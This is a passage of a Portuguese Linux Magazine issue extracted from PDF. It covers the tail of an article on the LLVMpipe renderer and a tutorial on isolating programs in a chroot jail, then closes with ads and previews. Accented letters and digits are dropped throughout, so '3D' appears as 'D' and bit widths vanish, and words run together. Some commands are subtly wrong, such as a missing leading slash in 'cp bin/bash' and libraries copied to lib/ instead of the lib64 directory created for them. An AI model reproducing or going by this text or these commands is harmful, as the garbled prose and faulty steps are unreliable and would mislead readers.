sempenho para seu driver proprie-
trio da NVIDIA. Como a Tungsten
Graphics agora pertence VMware,
fabricante de virtualizadores de mes-
mo nome, no nenhuma surpre-
sa que exista um driver GalliumD
para a placa grfica simulada das
mquinas virtuais.
Por dentro do pipeComo referncia e modelo para dri-vers aspirantes a leitores, a equipe
GalliumD fornece o softpipe driver.
Este driver executa os clculos D
do processador, uma transaoque extremamente longa e no
apropriada para uso dirio. JosFonseca, dessa forma, surgiu com
a ideia de rebaixar o softpipe driver
no compilador LLVM (quadro 1). Ele
e alguns colegas, entre eles Brian
Paul, inventor do Mesa, ajustaram o
softpipe driver com um rasterizador
Figura 4 Com o compilador LLVM, um frontend, como o compilador Clang C, cria um cdigo interme-dirio que um backend transfere para um programa, digamos, de processador x86, aps a otimizao.
Figura 5 Como reporta o glxinfo na linha destacada, o Unity exe-cuta sob o LLVMpipe. Podemos testar o LLVMpipe em uma mquinavirtual, como neste exemplo.
Quadro 1: Compilador LLVMO LLVM um compilador modular [7]. Primeiro, um componente frontend traduz o cdigo fonte para a lingua-
gem especial LLVM Intermediate Representation(IR) (gura 4). O cdigo do programa otimiza o LLVM antes deentreg-lo ao backend, o atual programa do processador especfico. Embora o processo parea complicado, o sis-
tema todo extremamente rpido, e o idioma LLVM IR pode ser executado em uma mquina virtual (gura 5). Paraacelerar ainda mais o processo, o usurio encontrar disponvel um compilador [8]que faz todo o trabalho na hora.
O LLMVpipe transfere os comandos necessrios para calcular os pixels da imagem acabada para o idioma IRLLVM. Alm de pontos, linhas e tringulos, estes tambm incluem os chamadosshaders. Shaders so miniprogra-mas que realmente funcionam com a placa grfica e, em geral, produzem grandes efeitos visuais como fumaa ereflexos. O LLVMpipe transforma todos os clculos necessrios em comandos da linguagem LLVM IR e, em seguida,permite que a LLVM os traduza e execute. Para que o LLVMpipe alcance seu pleno potencial, os desenvolvedo-res recomendam um sistema de 64 bits e um processador x86 com, pelo menos, a instruo de extenso SSE2.
Todos estes fatores contribuem para que o LLVMpipe apresente ao menos simples aplicativos 3D suavementena tela. Zack Rusin, desenvolvedor do LLVMpipe, relatou em seu blog que conseguia jogar o Alien Arena [9]em25 frames por segundo em um Xeon E5405 com baixa resoluo. O velho software rasterizador Mesa produziuum slideshow nico em 3,5 frames por segundo, em comparao [10]. Medidas feitas por Michael Larabel do sitePhoronix Internet confirmam esses valores.
Fronted LLVM IROtimizaode cdigo
BackendProgramacompelto
-
5/22/2018 Linux New Mwdia - Segurana
26/29
75Linux Magazine #106 | Setembrode 2013
mais potente (tambm conhecido
como rasterer ou renderizador) [5].
Este renderizador calcula a imagem
de pixel completa a partir dos da-
dos D. Para entregar a imagem o
mais depressa possvel, os clculos
fluem para um programa que, emseguida, permite que o compilador
LLVM os traduza e execute. Paraacelerar ainda mais o processo, o
rasterizador distribui os clculosem todos os cores disponveis do
processador. O resultado surge com
o nome de LLVMpipe [6].
ConclusoO LLVMpipe provavelmente no
poder controlar uma placa grficaD com um driver posteriormente
otimizado porque o processadorprincipal precisar lidar com muitas
tarefas, ao passo que a placa grfica
D projetada e otimizada para o
processamento rpido de grficosD. Alm disso, o trabalho com oLLVMpipe continua, com algumas
funes aguardando implementao.
O LLVMpipe, portanto, contar como
uma espcie de ltimo recurso, mas
seu desempenho adequado para
interfaces grficas e aplicativos D
simples, como prova a combinao
do Ubuntu . com Unity.n
Mais informaes[1]Khronos Group: http://www.khronos.org
[2]Mesa: http://www.mesa3d.org
[3]Gallium3D:http://freedesktop.org/wiki/Software/gallium/
[4]OpenVG at Wikipedia:http://en.wikipedia.org/wiki/OpenVG/
[5]Rasterization at Wikipedia:http://en.wikipedia.org/wiki/Rasterisation/
[6]LLVMpipe: http://www.mesa3d.org/llvmpipe.html
[7]LLVM: http://www.llvm.org
[8]Just-in-time compilation at Wikipedia:http://en.wikipedia.org/wiki/Just-in-time_compilation
[9]Alien Arena: http://red.planetarena.org
[10]The software renderer by Zack Rusin:http://zrusin.blogspot.de/2010/03/software-renderer.html
[11]LLVMpipe Still Doesnt Work For Linux Gaming; by Michael Larabel:http://www.phoronix.com/scan.php?page=news_item&px=MTEwODM
Disponvel no site
www.LinuxMagazine.com.br
Instalao e congifurao deservidores VoIP com Asterisk.
Configurao de ramais,
extenses, secretria eletrnica,monitoramento e espionagemde chamadas, planos dediscagem, URA e muitos outrosaspectos que abordam o uso decentrais telefnicas IP PBX.
Coleo
Academy!
Gostou do artigo?Queremos ouvir sua opinio.Fale conosco em:[email protected]
Este artigo no nosso site:http://lnm.com.br/article/8840
-
5/22/2018 Linux New Mwdia - Segurana
27/29
76 www.linuxmagazine.com.br
Priso privadaVirtualizar bom, mas s vezes pode ser um exagero, se tudo o que o usurio quiser fazer for executar um programaque poderia representar uma ameaa ao sistema. O chroot jails oferece uma alternativa leve, rpida e bem testada.por Paul C. Brown
Uma das coisas mais perigosas
que o usurio pode fazer no
sistema executar software
baixado da Internet a partir de um
site desconhecido ou ainda aplicativos
que no foram testados e que podem
conter erros fatais. Em ambos os casos,nunca aconselhvel arriscar dados
e hardware, executando aplicativos
duvidosos diretamente no sistema
utilizado diariamente para trabalho
e lazer. No entanto, o usurio no
precisa desistir de experimentar um
novo software. Poderia at ser uma
exigncia de trabalho, caso em que
o usurio trabalha na rea de TI de-
senvolvendo cdigo potencialmente
perigoso e, sejamos francos, todo o
cdigo experimental potencialmen-
te perigoso. No Linux, podemos criar
um ambiente fechado e controlado
para fazer estas coisas, e exatamente
sobre o que se trata o chroot.
Espao pessoalUsar ochroot de certa forma semelhan-
te a virtualizar um sistema, mas muito
mais limitado em termos de escopo.
Ao invs de recriar um sistema de com-
putador inteiro, ochrootpermite que ousurio crie um Shell do convidado e
um sistema de arquivos (inicialmente)
vazio em um diretrio favorito em sua
prpria rvore de diretrios.
O sistema convidado herda algu-
mas das caractersticas do sistema de
host sabidamente, o kernel e a maior
parte das variveis de ambiente mas
a rvore de diretrios desaparece,
juntamente com todos os comandos,
bibliotecas compartilhadas, diretrios
do dispositivo e outros recursos. Den-
tro desta ficha limpa de um sistema,
criamos um novo sistema de arquivos a
partir do zero, contendo apenas o que
necessrio para executar o aplicativo
que temos que testar; da o seu nome:
para todos os efeitos prticos, muda-mos o local do diretrio raiz.
Depois de haver decidido onde
ficar a chroot jail,o usurio pode
comear a copiar software para criar
um ambiente seguro. Devido s ca-
ractersticas deste tipo de ambiente,
altamente improvvel que o sistema
host ser afetado se alguma coisa der
errado. Por exemplo, quase impossvel
que aplicativos jailed modifiquem ou
apaguem arquivos de fora do chroot
no sistema host sendo o quase uma
palavra importante na frase anterior.
Compilando o jailCompilar um chroot jail muito
simples. Tudo o que o usurio tem
a fazer criar um novo diretrio e
apontar o chrootpara ele:
$ mkdir myjail$ sudo chroot myjail
Note que, embora o diretriopossa pertencer ao prprio usu-
rio, o chroots pode ser executado
com privilgios de superusurio,
da o sudono incio da linha.
No entanto, a entrada das duas linhas
anteriores s levar a um erro como:
chroot: failed to runcommand '/bin/bash':No such file or directory
Isso acontece porque o Shell Bash
como qualquer outro programa
e, quando o sistema tenta acessar
um Shell de dentro do jail, ele no o
encontra e quebra. Assim, o prximo
passo a criao de um programa
de Shell de dentro do jail.
Para isso, a primeira coisa a fazer
criar um diretrio bin(que ondeos programas executveis essenciais
de um sistema Linux geralmente se
encontram) no diretrio de teste e
copiar o bash do do /bindo host:
$ mkdir myjail/bin$ cp bin/bash myjail/bin
Podemos pensar que isso sufi-
ciente, mas, se tentarmos o chroot
novamente, ele retornar o mesmo
que antes, porque o Bash depende
de vrios outros arquivos que conte-
nham cdigo chamado de bibliote-
cas, que so necessrias para fazer o
trabalho. O usurio precisa descobrir
qual deles deve selecionar e copi-
-los para jail. Note que, de dentro do
jail, o resto do sistema invisvel, e o
usurio no pode acessar qualquer
Segurana
Listagem 1: Bibliotecasdependentes do Bash$ ldd /bin/bashlinux-vdso.so.1(0x00007fff10576000)libreadline.so.6 => /lib64/libreadline.so.6(0x00007fa02c744000)libtinfo.so.5 => /lib64/libtinfo.so.5(0x00007fa02c511000)libdl.so.2 => /lib64/libdl.so.2 (0x00007fa02c30d000)libc.so.6 => /lib64/libc.so.6(0x00007fa02bf60000)/lib64/ld-linux-x86-64.so.2(0x00007fa02c98c000)
-
5/22/2018 Linux New Mwdia - Segurana
28/29
77Linux Magazine #106 | Setembrode 2013
arquivo do exterior, incluindo essas
bibliotecas muito importantes.
Para descobrir quais bibliotecas o
Bash necessita, podemos usar o co-
mandoldd. A sintaxe muito simples:
tudo o que temos a fazer passar o
caminho e o nome do aplicativo quedesejamos verificar. Na listagem 1,
estamos executando lddpara Bash,
que retorna uma lista de bibliotecas
e onde elas esto instaladas. Observe
que a maioria reside em um diretrio
chamadolib64/, vinculado ao diret-
rio raiz (/). O 64indica que estamos
usando um sistema de bits. Se o
usurio estiver utilizando um sistema
de bits, o diretrio ser simples-
mente chamado de lib/.O primeiro item da lista, linux-vd-
so.so.1 (0x00007fff10576000), uma
biblioteca virtual usada em alguns
sistemas Linux, e podemos ignor-la
sumariamente. O restante das linhas
aponta para bibliotecas reais que
temos que copiar para um diretrio
com o mesmo nome no chroot jail:
$ mkdir myjail/lib64$ cp /lib64/libreadline.so.6 myjail/lib/
$ cp /lib64/libtinfo.so.5 myjail/lib/...
...e assim por diante. Depois de copiar
todos os arquivos, podemos testar
o jail novamente:
sudo chroot myjail/Password:bash-4.2#
Sucesso! O fato de agora termos
um prompt mostra que tudo est
funcionando como deveria. No en-tanto, logo iremos nos deparar com
algumas limitaes. Embora possa-
mos acessar os diretrios /bine /lib
que criamos no jail com o comandocd
e talvez copiar e mover arquivos para
ele, no podemos fazer muito mais
do que isso. No podemos nem listar
o contedo dos diretrios (embora
possamos usar o comando pwdpara
ver onde nos encontramos dentro da
rvore de diretrios).
Isso porque, enquanto cde pwd
so comandos integrados no Bash
conhecidos como builtin commands
o ls, programa utilizado para listar
o contedo do diretrio, no . Para
usar o ls, temos que passar por um
processo semelhante ao qual pas-samos para fazer com que o Bash
funcione, incluindo copiar todas as
bibliotecas das quais ele depende.
Para comear, saia do jail com:
bash-4.1# exit
em seguida, verifique a listagem 2
para ver como ele criado, a entrada
est em negrito). A lista de biblio-
tecas pode variar de sistema para
sistema. Algumas das bibliotecas
j esto no diretrio mijail/lib64,
assim, podemos ignor-las. Umavez concludo o processo, o usu-
rio ser capaz de usar lscomo faria
no sistema host. E isso tudo o que
podemos fazer com este comando.
O processo pode ficar muito mais
complicado se o usurio pretender
utilizar o jail com programas mais
complexos, por isso leia com aten-
o o quadro 1, que contm algumas
dicas sobre como fazer as coisas
funcionarem sem problemas.n
Listagem 2: Como fazer o lsfuncionar no jail01$ cp /bin/ls myjail/bin/02$ ldd /bin/ls03linux-vdso.so.1 =>
(0x00007ffffcb35000)04libselinux.so.1 => /lib64/
libselinux.so.1(0x00000036e3c00000)
05librt.so.1 => /lib64/librt.so.1(0x00000036e3400000)
06libcap.so.2 => /lib64/libcap.so.2(0x00000036ecc00000)07libacl.so.1 => /lib64/libacl.so.1
(0x00000036f1400000)08libc.so.6 => /lib64/libc.so.6
(0x00000036e1c00000)09libdl.so.2 => /lib64/libdl.so.2
(0x00000036e2000000)10/lib64/ld-linux-x86-64.so.2
(0x00000036e1800000)11libpthread.so.0 => /lib64/
libpthread.so.0(0x00000036e2400000)
12libattr.so.1 => /lib64/libattr.so.1 (0x00000036ef000000)
13$ cp /lib64/libselinux.so.1
myjail/lib64/14$ cp /lib64/librt.so.1 myjail/lib64/15$ cp /lib64/libcap.so.2 myjail/
lib64/16$ cp /lib64/libacl.so.1 myjail/
lib64/17$ cp /lib64/libpthread.so.0
myjail/lib64/18$ cp /lib64/libattr.so.1 myjail/
lib64/19$ sudo chroot myjail20Password:21bash-4.1# ls22bin lib6423bash-4.1#
Quadro 1:Como executaraplicativos complexos
Se o usurio quiser executaraplicativos que so muito maiscomplexos do que o ls em umchroot jail, logo ir descobrir queter que incluir diretrios inteirosantes que tudo funcione. O quetorna as coisas ainda mais difceis descobrir que alguns destes di-retrios, como /proc, /deve /sysnem sequer contm arquivos esubdiretrios reais, mas virtuais.
Arquivos como /dev/sdaou/proc/cpuinfono apontam paradados reais no disco rgido, mas
so criados quando h o bootdo sistema ou mesmo quando osistema est em execuo e nopode ser copiado ou movido. Elestambm no podem ser vinculadosaoln-sporque, como mencionadoanteriormente, o resto do sistemaalm do jail invisvel de dentrodele, logo, os links para arquivose diretrios fora do jail aparecemcomo quebrados.
Felizmente, h uma soluo paraeste problema. Usando a opo decomando mount -o bind, o usuriopode vincular diretrios para seu
diretrio e eles ainda estaro dispo-nveis quando executarmoschroot:
$ cd myjail$ mkdir proc$ mkdir dev$ mount -o bind /proc proc$ mount -o bind /dev dev
Mas, ateno: use este mtodocom moderao, se o seu objetivofor criar um ambiente isolado, poiso comandomount -o bindabrir umgrande buraco nas paredes do jail.
-
5/22/2018 Linux New Mwdia - Segurana
29/29
82 www.linuxmagazine.com.br
GEDDocumentos formam a grande massa
de conhecimentos de uma empresa.
Um sistema GED (Gesto Eletrnica de
Documentos) permite preservar esse
patrimnio e organizar eletronicamente adocumentao, para assegurar a informaonecessria, na hora exata, para a pessoa certa.Na prxima edio daLinux Magazine, voc
vai conhecer o sistema GED Alfresco, querevolucionou o mercado de colaborao
e compartilhamento de documentos em
uma rede empresarial e poder ser o mais
novo e fiel amigo de usurios que precisamarmazenar digitalmente documentos
importantes, colaborar em equipe atravsdo compartilhamento monitorado de
contedo e gerenciar como um todo as
informaes trocadas entre membros de
uma empresa. n
OpenStack
Capaz de gernciar os componentes
de mltiplas instncias virtualizadas,
o OpenStack um dos queridinhos
dos profissionais de infraestrutura evirtualizao da atualidade. livre, nopossui restries quanto quantida-
de de instncias e uma plataforma
robusta, extremamente til nestes
tempos onde o advento da computa-
o em nuvem j uma realidade. Naprxima edio da Admin Magazine
voc vai conhecer tudo o que essa in-
crvel ferramenta pode fazer por voc!No perca! n
Linux Magazine #107
Admin Magazine #10
Preview